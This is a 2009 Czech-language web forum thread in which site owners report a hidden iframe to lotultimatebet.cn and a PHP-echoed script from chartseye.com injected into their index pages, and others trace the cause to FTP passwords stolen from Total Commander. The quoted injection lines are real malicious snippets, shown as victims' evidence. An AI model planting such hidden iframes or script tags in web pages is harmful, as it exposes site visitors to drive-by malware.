Autor | Zpráva | ||
---|---|---|---|
Petr123 Profil * |
#1 · Zasláno: 13. 4. 2009, 10:41:51
Na stránkách se mi v souborech objevil tento kód
<iframe src="http://lotultimatebet.cn/in.cgi?income59" width=1 height=1 style="visibility: hidden"></iframe> nevíte, co to je zač a jak se tam mohl objevit? Děkuji za rady. |
||
Alphard Profil |
#2 · Zasláno: 13. 4. 2009, 10:59:55
Díra v aplikaci, nebo se někdo dostal k vašim FTP údajům, hacknutí hostingu nepovažuji za pravděpodobné.
Smažte to, změňte údaje na FTP a uvidíte, co to udělá. V aplikaci samozřejmě nesmí být nic ve stylu include $_GET['page']; eval() neznámého kódu apod. |
||
Senky Profil |
#3 · Zasláno: 13. 4. 2009, 11:00:32
Nepouzival si web-based FTP? Mne sa to tam dostalo takymto sposobom (ale iny kod). Alebo nevie niekto nahodou tvoje heslo na ftp? Alebo tam nemas nejaky nezabezpeceny upload a ten subor kde sa objavil kod nema prava 777? Alebo nieco podobne...
|
||
masinutza Profil |
Senky:
Hi i have the same problem: <body><iframe src="http://lotultimatebet.cn/in.cgi?income59" width=1 height=1 style="visibility: hidden"></iframe> Can anyone please help me with some tips or hints how to resove it. I couldn't find the hole from where he entered my site... |
||
Alphard Profil |
#5 · Zasláno: 13. 4. 2009, 12:10:53
masinutza:
Sorry, but this is Czech forum. We tolerate only Czech or Slovak. |
||
masinutza Profil |
Alphard:
Ahoj mám rovnaký problém: <body><iframe src="http://lotultimatebet.cn/in.cgi?income59" width=1 height=1 style="visibility: hidden"></iframe> Mohol by niekto prosím, pomôžte mi s pár rád a tipov, ako Rzeszów to. Nemohol som nájsť dieru, z ktorej všel mojich stránkach ... Mám o reakcii niektorých palice pre toto využitie, z mojej tvorby uživateľov Ale nemám už odpovede |
||
Petr123 Profil * |
#7 · Zasláno: 13. 4. 2009, 12:23:52
Myslím, že asi někdo hacknul údaje k FTP a byl to asi nějaký robot, protože ten kód napsal do stránek, který začínají 'index'. Jinak $_GET['page']; nepoužívám a stránka nemá práva 7777. Spíš mě zajímá, dá se nějak zjistit, co ten kód dělá? Přece jen tam byl asi hodinu a mohl třeba zjistit nějaký údaje od uživatelů (login, heslo, ...). Díky
|
||
Alphard Profil |
#8 · Zasláno: 13. 4. 2009, 12:33:37
Pár tipů už tady bylo, ale zopakuji:
• Prozraz ené údaje na FTP. Změňte si je a dávejte na ně lepší pozor. • Díra v aplikaci. Neošetřené include, eval, nezabezpečený upload a další. Hledá se špatně a bez kompletních kódu můžeme jenom hádat. Petr123: Neměl by. Spíš snaha napadnout počítač uživatele. Ale to neovlivníte, záleží to na systému, antivirech, firewallu atd. V lepším případě chtěli jen provést nějakou akci z různých IP. |
||
masinutza Profil |
Alphard:
děkuji a moc, zkusím to a hovoriť po tom, čo aj naďalej, ak majú problém |
||
Tomkorp Profil |
#10 · Zasláno: 15. 4. 2009, 20:19:35
Taky sem tento kod <iframe src="http://lotultimatebet.cn/in.cgi?income59" width=1 height=1 style="visibility: hidden"></iframe> mel na webu. Zmenil sem heslo k FTP a druhej den sem ten kod mel znova v index.php a nakonec pomohlo znova zmenit heslo k FTP a jeste vymazani ulozeneho hesla v total commandru. Nekdo asi zjistil heslo ulozene v total commanderu.
|
||
Alphard Profil |
#11 · Zasláno: 15. 4. 2009, 20:42:47
Tomkorp:
Ano, ukládat hesla v Total Commanderu není bezpečné. V jiném vklákně psal kolega Chamurappi, že je to nejčastější útok, s jakým se setkal. Souvisí to s tím, že hledat díru v aplikaci často vyžaduje indiviuální přístup. Nechce si PC zkontrolovat na spyware apod. Díry v aplikaci zmiňuji jenom pro úplnost, také jsem se s tím moc nesetkal. |
||
Koubí Profil |
#12 · Zasláno: 16. 4. 2009, 20:58:15
Měl jsem stejný problém na různých stránkách, na různých redakčních systéméch na dvou různých hosting společností,ale na obou se mi ve stejnou dobu objevil tento kod i na všech podstránkách. Dlouho sem pátral jaká může pít spojitost, protože ty stránky nic společného nemají a nakonec mi přišla možná jen jedna možnost a to TOTAL COMANDER, měl jsem tam uložený hesla ne všechny servery kde se mi objevil kod. Takže doporučuji smazat hesla. :-)
|
||
jrm Profil |
#13 · Zasláno: 17. 4. 2009, 07:19:07
Tak mne potkalo díky uložení hesel v Total Commanderu (TC)něco podobného, v hlavním souboru index.php se objevilo:
e c h o "<script type=\"text/javascript\" src=\"http://chartseye.com/bottom_news.js\"></script>\n"; Napadeny byly všechny soubory se jmény INDEX, MENU, MAIN, DEFAULT a jedno s jakou extenzí - .php/htm/html. Při pokusu je stáhnout k sobě a prohlédnout zkolaboval i TC a skoro i já. Čtěte na http://www.dsl.cz/clanky-dsl/clanek-1018/Nebezpecny-Total-Commander Dotaz: TC mi vyhovuje až moc (+ starého psa novým kouskům jen tak nenaučíš). Tuším, že lze i v TC použít SSL. Vyřešilo by to problematiku s hesly v TC? Provozuje to někdo? |
||
K8 Profil * |
#14 · Zasláno: 17. 4. 2009, 10:34:20
SSL nepomuze, nebot k heslum se utocnik dostane pomoci viru v PC, odkud se data posilaji na ftp - a tento vir si lokalne prohleda PC a najde konfiguracni soubor z totalcommanderu a ten "ukradne" s kompletni konfiguraci vsech ftp pripojeni (vcetne tech hesel) takze SSL nepomuze, on to SSL klidne pouzije taky (a pripadne neni problem si "ukrast" i certifikat, kdyby byl k tomu pripojeni potreba)
SSL pomuze "jen" proti odposlechnuti nekde na "dratech" mezi klientem a serverem - data nejsou citelna a proto se pak nedaji odposlechnout - ale dostat se nekam na router, kudy data prochazeji a delat tam odposlech neni az tak jednoduche (pokus se nejedna o nejakou komunitni sit) |
||
jrm Profil |
#15 · Zasláno: 17. 4. 2009, 12:17:38 · Upravil/a: jrm
K8 dík za info, došlo mi to :-D
http://www.ovsem.net/software/zavirovane-internetove-stranky-a-problematicky-total-commander/ Tak se chystá new TC s lepším šifrováním. http://fileforum.betanews.com/detail/Total-Commander-Beta/945901171/2 |
||
Časová prodleva: 15 let
|
0